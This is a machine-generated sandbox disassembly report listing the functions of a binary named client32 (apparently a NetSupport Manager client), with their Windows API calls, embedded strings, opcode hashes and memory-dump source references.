                                                        • Opcode ID: 74a23c6806cd996f4e5802ec0325577df80bd7c351eda1b89e39841f079f60ff
                                                        • Instruction ID: c02fd1ebd72f3abd6975baaa61c1d6d589ae8a261551f4e8277244e37f20d25c
                                                        • Opcode Fuzzy Hash: 74a23c6806cd996f4e5802ec0325577df80bd7c351eda1b89e39841f079f60ff
                                                        • Instruction Fuzzy Hash: 8511B479B0070A6BE710DE65DC84F9AB3D9AB88354F108439FA5597690EB71F801CBA1
                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,?), ref: 110AF24F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastMessageProcessTextWindowwsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2794799252-3129562787
                                                        • Opcode ID: 2da599f0c3f2941dd33979318759614f42c18a09b34261b493e4f111dfc93822
                                                        • Instruction ID: 30af45ef0dcef238f528407b1a4bc814dd764d345def6d437735f0addba69835
                                                        • Opcode Fuzzy Hash: 2da599f0c3f2941dd33979318759614f42c18a09b34261b493e4f111dfc93822
                                                        • Instruction Fuzzy Hash: 39113A7DB007126BD922DA55FC00F8FF399AF9966DF004468E90567784EB35BA10CAA3
                                                        APIs
                                                        • __strdup.LIBCMT ref: 110C5737
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastMessageProcess__strdupwsprintf
                                                        • String ID: *this==src$..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 3256405202-349135390
                                                        • Opcode ID: 1238c60e75543991bc3227262facd9733687b896ae40ff399294cd2a1af6fe5d
                                                        • Instruction ID: 990c6adcda38b5987a728539be4123f148fa86f5ba4ad2cdd8a82a2db87de86a
                                                        • Opcode Fuzzy Hash: 1238c60e75543991bc3227262facd9733687b896ae40ff399294cd2a1af6fe5d
                                                        • Instruction Fuzzy Hash: 431102BCF00A03ABC611DF19EC04F9AF3AAAF95A48700C0A5E96497711EB22B4048F91
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 111032E8
                                                          • Part of subcall function 11102790: SetEvent.KERNEL32(00000000), ref: 111027B4
                                                        • WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 1110331C
                                                          • Part of subcall function 11103100: EnterCriticalSection.KERNEL32(00000010,00000000,771B23A0,1100BE4B), ref: 11103108
                                                          • Part of subcall function 11103100: LeaveCriticalSection.KERNEL32(00000010), ref: 11103115
                                                        • PostMessageA.USER32(?,00000501,00000000,00000000), ref: 11103344
                                                        • PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 1110334B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
                                                        • String ID: Queue
                                                        • API String ID: 620033763-3191623783
                                                        • Opcode ID: 5ed127e90d7aea9cc1c571c6faff837e9d0f0bb831e3de670e3d281e69687fa7
                                                        • Instruction ID: d8bb1088ac88664d3c3efc55309011d502dc20e6f167e529d16559b1f6741692
                                                        • Opcode Fuzzy Hash: 5ed127e90d7aea9cc1c571c6faff837e9d0f0bb831e3de670e3d281e69687fa7
                                                        • Instruction Fuzzy Hash: B311A039A557219FDB119B64D8C4B0BF7A4AB4A75CF008939E9518B380DE70F800CBA1
                                                        APIs
                                                        • GetClassInfoA.USER32(00000000,NSMCobrMain,?), ref: 110B71E5
                                                        • LoadIconA.USER32(00000000,000032FA), ref: 110B7209
                                                        • LoadCursorA.USER32(00000000,000019C8), ref: 110B721D
                                                        • RegisterClassA.USER32(?), ref: 110B7250
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ClassLoad$CursorIconInfoRegister
                                                        • String ID: NSMCobrMain
                                                        • API String ID: 2883182437-2967143332
                                                        • Opcode ID: 1454587d98dabe09f0e1e52a1eccee313279903a0eb30fd0b654e57c9fcb1f51
                                                        • Instruction ID: a253c0c09f64e32af6d17fda3169afc3079e396ae35490942e04615450f6f666
                                                        • Opcode Fuzzy Hash: 1454587d98dabe09f0e1e52a1eccee313279903a0eb30fd0b654e57c9fcb1f51
                                                        • Instruction Fuzzy Hash: 6C015AB5D0522D9BCF00DFE8C8496EEBBBDFB08704F40496AF815B3280D77555408BA5
                                                        APIs
                                                        • _malloc.LIBCMT ref: 1107B027
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateErrorExitHeapLastMessageProcess_mallocwsprintf
                                                        • String ID: ..\CTL32\DataStream.cpp$IsA()$IsEmpty()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 1213237569-3592610322
                                                        • Opcode ID: b0d4951e3e1e982a5900b13c958f5742c237ff4dd3663e560167556411a43178
                                                        • Instruction ID: 8f9985f317ad91541f6e001387be189c660fec69166a5be52da1ea2e7750abee
                                                        • Opcode Fuzzy Hash: b0d4951e3e1e982a5900b13c958f5742c237ff4dd3663e560167556411a43178
                                                        • Instruction Fuzzy Hash: F6F090B5A00B155FE3709F55DC04B86F7E8AF14708F008529E5AA97A40E7B1B514CFD1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeString$__wcsicoll_memset
                                                        • String ID:
                                                        • API String ID: 3719176846-0
                                                        • Opcode ID: b59fc4aa0084b8af2c0cb7ab9d91f53fdc2d914e01a4c7aac3460fa52ae7c500
                                                        • Instruction ID: a4194a8621443a07a5b91cd7e8cbaf5f1c01176b50590b941be4798e65b70277
                                                        • Opcode Fuzzy Hash: b59fc4aa0084b8af2c0cb7ab9d91f53fdc2d914e01a4c7aac3460fa52ae7c500
                                                        • Instruction Fuzzy Hash: A2A1F775E046299FCB61CF59CC84ADAB7B9AF89305F2085D9E50CAB310DB31AE85CF50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Caret$ClientCreateDestroyRectShow
                                                        • String ID:
                                                        • API String ID: 3292185885-0
                                                        • Opcode ID: eec5a9e55dd84aaa02b758eb0de184b29d26ab499fca542160f29245d0eece66
                                                        • Instruction ID: 7f8c4dcae8a1f5dcc1e133171a0418012556dc92a04c507beb10c8b842d59a54
                                                        • Opcode Fuzzy Hash: eec5a9e55dd84aaa02b758eb0de184b29d26ab499fca542160f29245d0eece66
                                                        • Instruction Fuzzy Hash: DF519171E00B058BC715CE78C9C57AAF7FAEB88314F25952DE5AAC7280D634F945CB50
                                                        APIs
                                                        • _memset.LIBCMT ref: 11093412
                                                        • SHGetMalloc.SHELL32(?), ref: 11093421
                                                        • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000C00,00000000,?,?,?), ref: 110934A9
                                                        • CoTaskMemFree.OLE32(?), ref: 11093514
                                                        • CoTaskMemFree.OLE32(?), ref: 11093529
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeTask$FileInfoMalloc_memset
                                                        • String ID:
                                                        • API String ID: 2885524667-0
                                                        • Opcode ID: 89345285ef7d7bab315390cfc6260b6fce797b71e935e12d37aa82ac9be1b202
                                                        • Instruction ID: 28a74fc2d3e6b814f31ef4bd2b52e05c0b9688f5ab77d3eb3e4ee6575e525884
                                                        • Opcode Fuzzy Hash: 89345285ef7d7bab315390cfc6260b6fce797b71e935e12d37aa82ac9be1b202
                                                        • Instruction Fuzzy Hash: 64414B76A082189FDB11CF64CC94BEFB7B9AF49304F5041D9E44D9B240DA71AE85DF90
                                                        APIs
                                                        • _malloc.LIBCMT ref: 11151532
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • _free.LIBCMT ref: 11151545
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 1020059152-0
                                                        • Opcode ID: b87245d6c8a11ff54dd947b9a3f53e119b3ac4d58a83e5b28fb18c8775291f84
                                                        • Instruction ID: 35b369d0f5c4220ee84277d88253d6fdcb9dc3b21ba59b57d6bf339a69f5eb09
                                                        • Opcode Fuzzy Hash: b87245d6c8a11ff54dd947b9a3f53e119b3ac4d58a83e5b28fb18c8775291f84
                                                        • Instruction Fuzzy Hash: 8B110A37410623ABCBD32F74980465EFB9AAF472BCF594525F83AC7180DF3499418791
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB09B
                                                        • LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0BE
                                                        • SetEvent.KERNEL32(?,?,?,?,11043F5C,?,00000001), ref: 110AB0DA
                                                        • LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0E1
                                                        • LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0F7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                        • String ID:
                                                        • API String ID: 3394196147-0
                                                        • Opcode ID: 8c47059aaa007ad8633e5d8c3be54e8c278fd32cc50d61e0effaef4322f575e5
                                                        • Instruction ID: e0d87326b4d86e53b28e3cee19c451b2299f4d0e942967006842b7f646d6e484
                                                        • Opcode Fuzzy Hash: 8c47059aaa007ad8633e5d8c3be54e8c278fd32cc50d61e0effaef4322f575e5
                                                        • Instruction Fuzzy Hash: 020167335006549FD321A6A9E484BDBFBE8FB6B365F04852AF09BC6500D7B5A045C7A1
                                                        APIs
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110B5479
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Xinvalid_argument_freestd::_
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$vector<T> too long
                                                        • API String ID: 3009493112-1764033307
                                                        • Opcode ID: 1467557cae63413adfea8cf217ea5322af11f329c2c3a2257ad9f516cd4137f2
                                                        • Instruction ID: d3742dddefd9539a2c6faf75fa5aff6455038083edce66c72e6810edab36b23a
                                                        • Opcode Fuzzy Hash: 1467557cae63413adfea8cf217ea5322af11f329c2c3a2257ad9f516cd4137f2
                                                        • Instruction Fuzzy Hash: 39B1D979E0121A9BDF04CFA4CC80AEEB7B5EF88718F144669F915A7380DB71AD44CB94
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strncpy
                                                        • String ID: Client.
                                                        • API String ID: 2961919466-3668916897
                                                        • Opcode ID: c1fb8859e18d76fc1079392e84fc703e70aac477c314df1099eb761ae4e062e0
                                                        • Instruction ID: 572398fb48615d3f05e5c1c88e4c2dd5f7b798ba22a18aad523c76445d718ab6
                                                        • Opcode Fuzzy Hash: c1fb8859e18d76fc1079392e84fc703e70aac477c314df1099eb761ae4e062e0
                                                        • Instruction Fuzzy Hash: E24196B5D002499FDB50CF78C8C5BEABBF4AF49314F1441A9E918E7241EB35AA04CBA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
